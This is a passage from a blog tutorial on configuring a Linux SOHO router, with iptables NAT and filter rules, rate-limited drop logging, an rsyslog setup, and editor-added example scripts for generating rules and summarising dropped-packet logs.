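<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-weight: 400; white-space: pre-wrap;">The NAT and filter screenshots above are images, so the file below is an added example, written by the editor rather than taken from the post or its repository, that reproduces the described behaviour in iptables-restore format: the NAT one-liner with the optional Squid redirect, the LOG_DROPS chain, the common-sense protections, and the INPUT accepts for loopback, DNS, DHCP, NTP and Squid from the inside segments that the next part of the article describes. The SSH accept from the inside and the FORWARD rules are assumptions added so the router stays administrable and actually forwards traffic; the original's FORWARD section is not shown on this page.</span></div>

```text
# /etc/iptables.rules (added example, iptables-restore format)
# WAN = eth0; inside = eth1..eth3 carrying subnets of 10.0.0.0/8.
# Load with: iptables-restore < /etc/iptables.rules   Review: iptables -L -n -v

*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
# Optional Squid bonus: rewrite inside web traffic to the local proxy on
# TCP 3128. Uncomment only when Squid is running in intercept mode.
#-A PREROUTING ! -i eth0 -s 10.0.0.0/8 -p tcp --dport 80 -j REDIRECT --to-ports 3128
# The NAT one-liner: everything from the inside that leaves via eth0 is
# rewritten to eth0's address. MASQUERADE suits both static and DHCP WAN.
-A POSTROUTING -s 10.0.0.0/8 -o eth0 -j MASQUERADE
COMMIT

*filter
# Default deny for traffic to and through the router; traffic the router
# itself originates is allowed.
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
:LOG_DROPS - [0:0]

# LOG_DROPS: one rate-limited kernel log line, then drop. The limit stops a
# flood of junk from filling the disk with log entries.
-A LOG_DROPS -m limit --limit 5/min --limit-burst 10 -j LOG --log-prefix "IPT-DROP: " --log-level 4
-A LOG_DROPS -j DROP

# Common-sense protections. The source checks are pinned to eth0 because the
# inside segments legitimately carry 0.0.0.0 (DHCP discover) and RFC1918.
-A INPUT -i eth0 -s 0.0.0.0/8 -j LOG_DROPS
-A INPUT -i eth0 -s 10.0.0.0/8 -j LOG_DROPS
-A INPUT -i eth0 -s 172.16.0.0/12 -j LOG_DROPS
-A INPUT -i eth0 -s 192.168.0.0/16 -j LOG_DROPS
-A INPUT -i eth0 -s 224.0.0.0/4 -j LOG_DROPS
# Second and later IP fragments.
-A INPUT -f -j LOG_DROPS
# TTL below 4: nothing legitimate should arrive that close to expiry.
-A INPUT -m ttl --ttl-lt 4 -j LOG_DROPS
# Port 0 is never a valid service port.
-A INPUT -p tcp --dport 0 -j LOG_DROPS
-A INPUT -p udp --dport 0 -j LOG_DROPS
# All TCP flags set, or none set: malformed by definition.
-A INPUT -p tcp --tcp-flags ALL ALL -j LOG_DROPS
-A INPUT -p tcp --tcp-flags ALL NONE -j LOG_DROPS

# What the router itself accepts.
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# bind9 on any interface, since the router may host its own zones.
-A INPUT -p udp --dport 53 -j ACCEPT
-A INPUT -p tcp --dport 53 -j ACCEPT
# From the inside only. DHCP is matched on interface and ports, not source
# address: a client has source 0.0.0.0 until it holds a lease.
-A INPUT ! -i eth0 -p udp --sport 68 --dport 67 -j ACCEPT
-A INPUT ! -i eth0 -s 10.0.0.0/8 -p udp --dport 123 -j ACCEPT
-A INPUT ! -i eth0 -s 10.0.0.0/8 -p tcp --dport 3128 -j ACCEPT
# Assumption (not in the post): SSH administration from the inside only.
-A INPUT ! -i eth0 -s 10.0.0.0/8 -p tcp --dport 22 -j ACCEPT
-A INPUT -j LOG_DROPS

# Forwarding (assumed): inside -> Internet plus replies; nothing unsolicited
# inbound. Traffic between inside segments is NOT forwarded by this example;
# add explicit rules per segment pair if you need it.
-A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A FORWARD ! -i eth0 -s 10.0.0.0/8 -o eth0 -j ACCEPT
-A FORWARD -j LOG_DROPS
COMMIT
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-weight: 400; white-space: pre-wrap;">Dropped packets show up in the kernel log with the "IPT-DROP: " prefix, so "grep IPT-DROP /var/log/kern.log" is the quickest way to see what the common-sense rules are catching on the WAN side.</span></div>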
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the next part of the INPUT section, we define the rules for the traffic that the router itself will accept:</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept all traffic to the loopback interface. A lot of software uses loopback for internal communication, and it is better not to break it.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept traffic for the Domain Name Service (DNS) bind9 server on any interface. This is needed because we are running bind9 on the router itself, and we may well decide to host some of our own DNS zones.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept specific traffic from our internal network. This includes DNS, DHCP server requests, network time protocol, and Squid traffic (if you choose to run Squid).</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Accept internet control message protocol (ICMP).</span></div>
</li>
</ul>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="277" src="https://lh3.googleusercontent.com/0ecs9MefBBtI53l_6-sfnv9m77feSYWNuQJd4yLTq8HDVqcHELDAjnpsl28q2t4eZFareFsUo193p3fKfn9wMxCE9VOeti_R_PkoA4zhwkW8z4wvIHoOX_Bau5ERKj5OzbUcIFGR" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="461" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Packet input/ingress (to router) section of “filter” section</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the OUTPUT section, we allow the router to send all traffic to the loopback interface, and then define the rules under which the router itself may transmit to the internal network and to the Internet:</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Transmit DNS traffic to any host on any network.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allow the router to perform “WHOIS” queries on TCP port 43, and allow Ubuntu software updates over HTTP/HTTPS.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allow the router to perform Network Time Protocol queries.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allow the router to transmit DHCP INFORM packets on the internal network.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allow the router to transmit ICMP packets on the internal network.</span></div>
</li>
</ul>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="241" src="https://lh4.googleusercontent.com/lEUDbbpgKLK4v7lBBIDtBIaqxtrd0t40s3vItm8V8-S3GM_dkkDCmvIbqohai92QUS_jVxpnniMCrmUWYmFkKTfnunEDkfoNxvgNMHCvkWBhXRZSvXQvJ2M_s59ilYyKN1ZKaiWL" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="529" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Packet output/egress section (from router) of “filter” section</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="107" src="https://lh3.googleusercontent.com/AorzQkaN7tGcqrciCzSmb3QCfJDzvVBvMwEjHTVFPpZGxj4Ggarf58RwGpqJT5hEvgVS43AoPNG7UYzLX_4ZrPs7lElRGRlBZapBQMV_GeiTsAA2-cHSNRihx2BmDeo4SszOIWXW" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="535" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now we accept state related packet flows, and then drop and log anything else</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The FORWARD section of the IPTABLES rules determines exactly what traffic is able to flow (be forwarded) </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">across</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> your router. It is important not to confuse this section with the INPUT/OUTPUT portions of the rules, which govern only traffic to and from the router itself. The FORWARD section is where the magic happens to get packets from your internal network to the Internet. In this example, we have a fairly liberal policy which allows all IPv4 TCP, UDP, and ICMP traffic to the Internet and accepts any state-related traffic.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="115" src="https://lh5.googleusercontent.com/lMeKYar16sPM9HEchb3Mj7A1rSet3JBCZg6SMfcUYFlxDfTRvMvjwwuPzmTyOIDv46e_Auy1gdSRJ8NBp1xr5Zah-6b7Y1X9KUfirkcSwwjvaxmIrclOjhLQm_O1JtgXFhsRfEHq" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="546" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Packets that will be forwarded across the router interfaces</span></div>
<br /><br /><br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As a final step in our configuration, we log all dropped packets to the syslog LOCAL7 facility. The idea is that we can configure “rsyslog” with a rule that matches the “iptables:” prefix and writes the logging data to its own file.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="129" src="https://lh5.googleusercontent.com/zM_prIQJZdK4_58O1olrsKr-VS0nvV2uvcHBFyKnkMuB50dfYVkiMBmxhcczrRkxf8eFIadGaswfSG69q82DDYhwuVg65FsMLtMBSWJzEdANG5fceOvERF1NXjiaRx7pW-BkPs-X" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="536" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Finally, we log things by prefixing “iptables:” to the syslog data flow</span></div>
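<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The INPUT, OUTPUT, FORWARD, state and logging rules described above, written out as one shell script that emits the iptables commands so they can be reviewed before they are applied. This is an added example, not the script from the post or from the soho_router repository. It assumes eth0 is the Internet-facing interface (the post names only eth1 to eth3 in this section), uses the conntrack match for the state rules, rate-limits the LOG rule, and matches DHCP requests on the ingress interface rather than on a source subnet, because a DHCP DISCOVER arrives from 0.0.0.0. One caveat the post does not mention: the LOG target itself only takes a priority (--log-level), so the “iptables: ” prefix is what the rsyslog rule has to key on.</span></div>

```shell
#!/bin/sh
# Added example, not the blog's or the soho_router repository's own script.
# Emits the "filter" rules described in the post as plain iptables commands so
# they can be reviewed, diffed, or piped to "sh" on the router itself.
# Assumptions (not stated on the page): eth0 faces the Internet and eth1-eth3
# are the internal segments.
WAN=${WAN:-eth0}
LAN_IFS=${LAN_IFS:-"eth1 eth2 eth3"}
IPT=${IPT:-iptables}

gen_filter_rules() {
    # Default deny on every chain; everything below is an explicit allow.
    for chain in INPUT OUTPUT FORWARD; do
        echo "$IPT -P $chain DROP"
    done

    # Common-sense protections: a TCP header with no flags or all flags set is
    # never legitimate traffic, so drop it before any accept rule can see it.
    echo "$IPT -A INPUT -p tcp --tcp-flags ALL NONE -j DROP"
    echo "$IPT -A INPUT -p tcp --tcp-flags ALL ALL -j DROP"

    # INPUT: packets addressed to the router itself.
    echo "$IPT -A INPUT -i lo -j ACCEPT"                 # never break loopback
    echo "$IPT -A INPUT -p udp --dport 53 -j ACCEPT"     # bind9, any interface
    echo "$IPT -A INPUT -p tcp --dport 53 -j ACCEPT"
    for ifc in $LAN_IFS; do
        # DHCP DISCOVER comes from 0.0.0.0 to 255.255.255.255, so match on the
        # ingress interface; a "-s <subnet>" rule would never see it.
        echo "$IPT -A INPUT -i $ifc -p udp --sport 68 --dport 67 -j ACCEPT"
        echo "$IPT -A INPUT -i $ifc -p udp --dport 123 -j ACCEPT"   # NTP
        echo "$IPT -A INPUT -i $ifc -p tcp --dport 3128 -j ACCEPT"  # Squid (optional)
    done
    echo "$IPT -A INPUT -p icmp -j ACCEPT"

    # OUTPUT: packets the router itself originates.
    echo "$IPT -A OUTPUT -o lo -j ACCEPT"
    echo "$IPT -A OUTPUT -p udp --dport 53 -j ACCEPT"    # DNS to any host
    echo "$IPT -A OUTPUT -p tcp --dport 53 -j ACCEPT"
    echo "$IPT -A OUTPUT -p tcp --dport 43 -j ACCEPT"    # WHOIS
    echo "$IPT -A OUTPUT -p tcp -m multiport --dports 80,443 -j ACCEPT"  # apt updates
    echo "$IPT -A OUTPUT -p udp --dport 123 -j ACCEPT"   # NTP
    for ifc in $LAN_IFS; do
        echo "$IPT -A OUTPUT -o $ifc -p udp --sport 67 --dport 68 -j ACCEPT"  # DHCP replies
        echo "$IPT -A OUTPUT -o $ifc -p icmp -j ACCEPT"
    done

    # FORWARD: what crosses the router. Liberal, as in the post: any IPv4
    # TCP/UDP/ICMP from an internal segment out to the Internet.
    for ifc in $LAN_IFS; do
        for proto in tcp udp icmp; do
            echo "$IPT -A FORWARD -i $ifc -o $WAN -p $proto -j ACCEPT"
        done
    done

    # Replies to anything accepted above come back through connection tracking.
    for chain in INPUT OUTPUT FORWARD; do
        echo "$IPT -A $chain -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT"
    done

    # Whatever is left is logged (rate-limited) with the "iptables: " prefix
    # that the rsyslog rule keys on, then falls through to the DROP policy.
    for chain in INPUT OUTPUT FORWARD; do
        echo "$IPT -A $chain -m limit --limit 5/min -j LOG --log-prefix \"iptables: \" --log-level 7"
    done
}

# Usage on the router (as root), once the NAT/masquerade rules from the
# earlier part of the post are in place and net.ipv4.ip_forward is enabled:
#   gen_filter_rules | sh
# Without root, or to review first:  gen_filter_rules
```

<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The state rule is placed after the explicit accepts, as the post describes; putting it first is the more common ordering and saves a few rule evaluations per packet, but the result is the same either way.</span></div>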
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">For extra information, here is the “rsyslog” configuration file I use to log the data.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="68" src="https://lh6.googleusercontent.com/YtoEBd16J4GBYVl5ZXCGd0V_dEqvYJO_5Knrm9tMQuItA0PfZ2Q3KJ6ReoGnil7g85PGnaa3fMCV-O94-vAm9Y399kwKZRxBR9aBOBi7hbtTMJnttY4ypZUyj9vqdP5c0JvL3Ro0" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="490" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/rsyslog.d/30-iptables.conf</span></div>
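<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Once the rsyslog rule has the dropped-packet lines in their own file, the next thing you want is a quick summary of what is being dropped. The script below is an added example, not part of the post or the repository: it parses constructed sample lines in the format the iptables LOG target emits (IN=, OUT=, SRC=, DST=, PROTO=, DPT= and so on), counts drops per source and destination port, and separates Internet-side scanning noise from internal hosts hitting ports the INPUT rules do not allow. A matching rsyslog rule in the property-based filter syntax would be “:msg, contains, "iptables: " -/var/log/iptables.log” followed by “&amp; stop” so the lines do not also land in the general syslog; “contains” rather than “startswith” because the kernel timestamp can precede the prefix, and the file path is an assumption.</span></div>

```shell
#!/bin/sh
# Added example, not from the post or the soho_router repository. Summarises
# the dropped-packet lines that the rsyslog rule writes to its own file.
# The sample below is constructed for the example; its field layout
# (IN= OUT= MAC= SRC= DST= ... PROTO= SPT= DPT=) is what the iptables LOG
# target emits, with the "iptables: " prefix from the post.
WAN=${WAN:-eth0}   # assumption: eth0 is the Internet-facing interface

# Constructed sample: three probes from one Internet host (two at SSH, one at
# RDP), a UDP packet from another, and an internal host trying SSH to the router.
SAMPLE_LOG='Mar  1 14:15:01 router kernel: [1001.1] iptables: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=198.51.100.2 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=40001 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  1 14:15:02 router kernel: [1002.2] iptables: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=198.51.100.2 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=40002 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  1 14:15:03 router kernel: [1003.3] iptables: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=198.51.100.2 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=40003 DPT=3389 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  1 14:15:04 router kernel: [1004.4] iptables: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.18.0.9 DST=198.51.100.2 LEN=60 TOS=0x00 PREC=0x00 TTL=60 ID=1 PROTO=UDP SPT=5353 DPT=5060 LEN=40
Mar  1 14:15:05 router kernel: [1005.5] iptables: IN=eth1 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.168.1.77 DST=192.168.1.1 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=2 DF PROTO=TCP SPT=51000 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0'

# drop_summary : stdin = log lines, stdout = "count src proto dport", most
# frequent first. Tokens without "=" (DF, SYN, the timestamp) are skipped;
# a protocol without ports (ICMP) is shown with "-" as the port.
drop_summary() {
    awk '
        /iptables:/ {
            split("", f)
            for (i = 1; i <= NF; i++)
                if (split($i, kv, "=") == 2) f[kv[1]] = kv[2]
            dpt = (f["DPT"] == "") ? "-" : f["DPT"]
            n[f["SRC"] " " f["PROTO"] " " dpt]++
        }
        END { for (k in n) print n[k], k }
    ' | sort -k1,1nr -k2,2 -k4,4n
}

# top_sources : stdin = log lines, stdout = "count src", most frequent first.
top_sources() {
    awk '
        /iptables:/ { for (i = 1; i <= NF; i++) if ($i ~ /^SRC=/) n[substr($i, 5)]++ }
        END { for (k in n) print n[k], k }
    ' | sort -k1,1nr -k2,2
}

# wan_drops : keep only packets that arrived on the Internet side and were
# aimed at the router itself (OUT is empty): background scanning noise, as
# opposed to internal hosts hitting a port the INPUT rules do not allow.
wan_drops() {
    grep " IN=$WAN OUT= "
}

# Usage with the constructed sample (on a router, feed the rsyslog file instead):
#   printf '%s\n' "$SAMPLE_LOG" | drop_summary
#   printf '%s\n' "$SAMPLE_LOG" | wan_drops | top_sources
```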
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">DHCP, and DNS Services</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now that we have covered the essential core components of forwarding packets, we can talk about DHCP and DNS. Starting with DHCP, we need to provide basic IP address service on our three internal network segments. On each segment, the dynamic range will start at x.x.x.50 so that a little static address space is reserved for other miscellaneous uses. We will also set lease times to 30 days (30 * 86400 seconds). Addresses will be provided on all three internal network interfaces (eth1, eth2, and eth3). This file is to be saved as “/etc/dhcp/dhcpd.conf”.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="569" src="https://lh6.googleusercontent.com/McK6Yq6Dz219Tq3Bvl0aPXiX1gKG7ue61LRzud0nU3coqLc-QW_wUvsWuTZX_Nx9BZtuzralH5qKFrleG922UZAkFw73UhymFElNKSAeqBBUZWM4u14bVjfyvST8rMIE5wjiX03q" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="422" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/dhcp/dhcpd.conf</span></div>
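<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
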